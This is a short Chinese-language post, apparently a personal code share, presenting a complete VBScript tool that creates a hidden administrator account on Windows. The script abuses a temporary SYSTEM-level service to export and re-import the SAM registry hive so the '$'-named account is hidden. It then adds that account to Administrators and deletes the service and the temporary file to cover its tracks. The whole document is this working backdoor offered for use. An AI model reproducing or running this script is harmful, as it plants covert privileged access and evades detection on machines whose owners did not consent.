系统隐藏账户添加脚本

早期写的代码，见笑了

'==============================================================
' Copyright (c) veterans. All rights reserved.
' ScriptName: ca.vbs
' Creation Date: 28/6/2007
' Last Modified: 28/6/2007
' Author: veterans
' E-mail: [email protected]
' Description: System hide account creation tool.
'==============================================================
On Error Resume Next

strUserName = Wscript.Arguments(0)
strPassWord = Wscript.Arguments(1)
'接受两个参数，分别为用户名和密码

If (lcase(right(wscript.fullname,11))="wscript.exe") Then
	WScript.Quit(0)
End If
'判断脚本宿主

If wscript.arguments.count<2 Then
	Wscript.Echo "System hide account creation tool."
	Wscript.Echo ""
	Wscript.Echo "Usage: cscript.exe //nologo " & WScript.ScriptName & " username$ password"
	WScript.Quit(0)
End If
'判断输入的参数个数

Set ObjectNetwork = CreateObject("Wscript.Network")
strComputer = ObjectNetwork.ComputerName
'获取计算机名，必须用字符串，不能用.代替

Set ObjectWMI = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")

Set CheckAccount = ObjectWMI.ExecQuery("Select * from Win32_UserAccount WHERE Name='" & strUserName & "'")
If CheckAccount.count<>0 Then
	Wscript.Echo "Account already exists."
	WScript.Quit(0)
End If
'检测账户是否存在

Set ObjectComputer = GetObject("WinNT://" & strComputer & ",computer")
Set CreateAccount = ObjectComputer.Create("user", strUserName)
CreateAccount.SetPassword strPassWord
CreateAccount.SetInfo
'添加用户，但不属于任何组

strServiceName = "ForCreateAccount"
Set CheckService = ObjectWMI.ExecQuery("Select * from Win32_UserAccount WHERE Name='" & strServiceName & "'")
If CheckService.count<>0 Then
	strServiceName = "ForCreateAccount-test"
End If
'检测服务是否存在

Set ObjectSvr = ObjectWMI.Get("Win32_Service")
ObjectSvr.Create strServiceName, strServiceName, "c:\windows\regedit.exe /e %temp%\user.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users", 16, 2, "Automatic", true, Null, null
'添加服务以获得系统权限，导出注册表

Set ObjectServices = ObjectWMI.ExecQuery("Select * from Win32_Service where Name='" & strServiceName & "'")
For each ObjectService in ObjectServices
	ObjectService.StartService()
	ObjectService.StopService()
	'导出注册表
	
	Set ObjectAccount = GetObject("WinNT://" & strComputer & "/" & strUserName & ",user")
	
	Set DelAccount = GetObject(ObjectAccount.Parent)
	DelAccount.delete "user", ObjectAccount.Name
	'删除用户
	
	WScript.Sleep 1000
	
	ChangeReturn = ObjectService.Change( , "c:\windows\regedit.exe /s %temp%\user.reg")
	ObjectService.StartService()
	ObjectService.StopService()
	'导入注册表
	
	ObjectService.Delete()
	'删除服务
	
	Set ObjectFiles = ObjectWMI.ExecQuery("Select * from cim_datafile where name='c:\\windows\\temp\\user.reg'")
	For Each ObjectFile in ObjectFiles
		ErrorReturn = ObjectFile.Delete
	Next
	'删除临时文件
	
	Set AddGroup = GetObject("WinNT://" & strComputer & "/Administrators,group")
	AddGroup.Add(ObjectAccount.ADsPath)
	'将用户添加到管理员组
Next

Set ObjectGroupUsers = ObjectWMI.ExecQuery("Select * from Win32_GroupUser")
For Each ObjectUser In ObjectGroupUsers

	Group = split(ObjectUser.GroupComponent,"=")
	User = split(ObjectUser.PartComponent,"=")
	
	If (User(2)="""" & strUserName & """" and Group(2)="""Administrators""") Then
		Wscript.Echo "Account creation success."
		WScript.Quit(0)
	End If
	
Next
Wscript.Echo "Account creation failure."
'验证账户是否创建成功